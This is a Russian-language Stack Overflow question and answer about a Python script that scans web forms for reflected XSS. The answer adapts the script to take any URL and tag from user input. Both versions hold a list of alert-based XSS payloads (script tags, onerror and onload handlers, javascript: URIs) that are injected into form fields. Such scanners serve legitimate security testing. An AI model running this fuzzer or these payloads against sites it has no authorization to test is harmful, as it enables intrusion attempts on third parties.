Python парсинг на поиск xss-уязвимостей с вводом url, тега

Рейтинг: -3Ответов: 1Опубликовано: 30.07.2025

У меня ниже код для парсинга на поиск xss-уязвимостей. В программе указан для проверки локальный хост, тэг. Как в input передать тэги, атрибуты Например: url_input = input (введите url:), teg_input = input (введите тег:), type_input = input (введите тип:)

import requests
from bs4 import BeautifulSoup

def test_xss(url):
    payloads = [
        '<form action="javascript:alert(\'XSS\')"><input type="submit"></form>',
        '<script>alert("XSS")</script>',
        '"><script>alert("XSS")</script>',
        '"><img src=x onerror=alert("XSS")>',
        'javascript:alert("XSS")',
        '<body onload=alert("XSS")>',
        '"><svg/onload=alert("XSS")>',
        '<iframe src="javascript:alert(\'XSS\');">',
        '\'"--><script>alert("XSS")</script>',
        '<img src="x" onerror="alert(\'XSS\')">',
        '<input type="text" value="<script>alert(\'XSS\')</script>">',
        # you can add as much as you want
        ]

    response = requests.get(url)
    soup = BeautifulSoup(response.text, 'html.parser')
    forms = soup.find_all('form')
    found_xss = False
    
    for form in forms:
        action = form.get('action')
        method = form.get('method', 'get').lower()
     
        for payload in payloads:
            data = {}
            # Find inputs in the form and fill them with test data
            for input_tag in form.find_all('input'):
                input_name = input_tag.get('name')
                input_type = input_tag.get('type', 'text')
                if input_type == 'text':
                    data[input_name] = payload
                elif input_type == 'hidden':
                    data[input_name] = input_tag.get('value', '')
          
            if method == 'post':
                response = requests.post(url + action, data=data)
            else:
                response = requests.get(url + action, params=data)
          
            if payload in response.text:
                print(f'XSS found ({payload}): {url + action}')
                found_xss = True
                break 
 
    if not found_xss:
        print(f'XSS not found: {url}')

test_url = 'http://127.0.0.1:5000'
test_xss(test_url)
python xss
Источник: Stack Overflow на русском

Ответы

▲ 0
import re
import urllib.parse as up
import requests
from bs4 import BeautifulSoup

PAYLOADS = [
    '<form action="javascript:alert(\'XSS\')"><input type="submit"></form>',
    '<script>alert("XSS")</script>',
    '"><script>alert("XSS")</script>',
    '"><img src=x onerror=alert("XSS")>',
    'javascript:alert("XSS")',
    '<body onload=alert("XSS")>',
    '"><svg/onload=alert("XSS")>',
    '<iframe src="javascript:alert(\'XSS\');">',
    '\'"--><script>alert("XSS")</script>',
    '<img src="x" onerror="alert(\'XSS\')">',
    '<input type="text" value="<script>alert(\'XSS\')</script>">',
]


def build_full_url(base: str, action: str) -> str:
    action = action or ""
    return up.urljoin(base, action)


def test_xss(url: str, tag_hint: str = "form") -> None:
    url = url.strip()
    if not url.startswith(("http://", "https://")):
        url = "http://" + url

    print(f"[+] Получение {url} …")
    try:
        resp = requests.get(url, timeout=10)
        resp.raise_for_status()
    except requests.RequestException as e:
        print(f"[!] Не удаётся найти {url}: {e}")
        return

    soup = BeautifulSoup(resp.text, "html.parser")

    tags = soup.find_all(re.compile(tag_hint, re.I))
    if not tags:
        print(f"[!] Нет найденных тегов  <{tag_hint}> .")
        return

    print(f"[+] Тег найден {len(tags)} <{tag_hint}> .")

    found = False
    for tag in tags:
        action = build_full_url(url, tag.get("action"))
        method = tag.get("method", "get").lower()

        for payload in PAYLOADS:
            data = {}
            for inp in tag.find_all("input"):
                name = inp.get("name")
                if not name:
                    continue
                inp_type = inp.get("type", "text").lower()
                if inp_type == "text":
                    data[name] = payload
                else:
                    data[name] = inp.get("value", "")

            try:
                if method == "post":
                    r = requests.post(action, data=data, timeout=10)
                else:
                    r = requests.get(action, params=data, timeout=10)
            except requests.RequestException as e:
                print(f"[!] Запрос не выполнен {action}: {e}")
                continue

            if payload in r.text:
                print(f"[+] XSS найдена! Загрузчик: {payload} @ {action}")
                found = True
                break

    if not found:
        print("[-] Нет найденных загрузчиков.")



target = input("Enter URL: ").strip()
hint = input("Enter tag to fuzz inside (form / input / textarea …) [form]: ").strip()
if not hint:
        hint = "form"
test_xss(target, hint)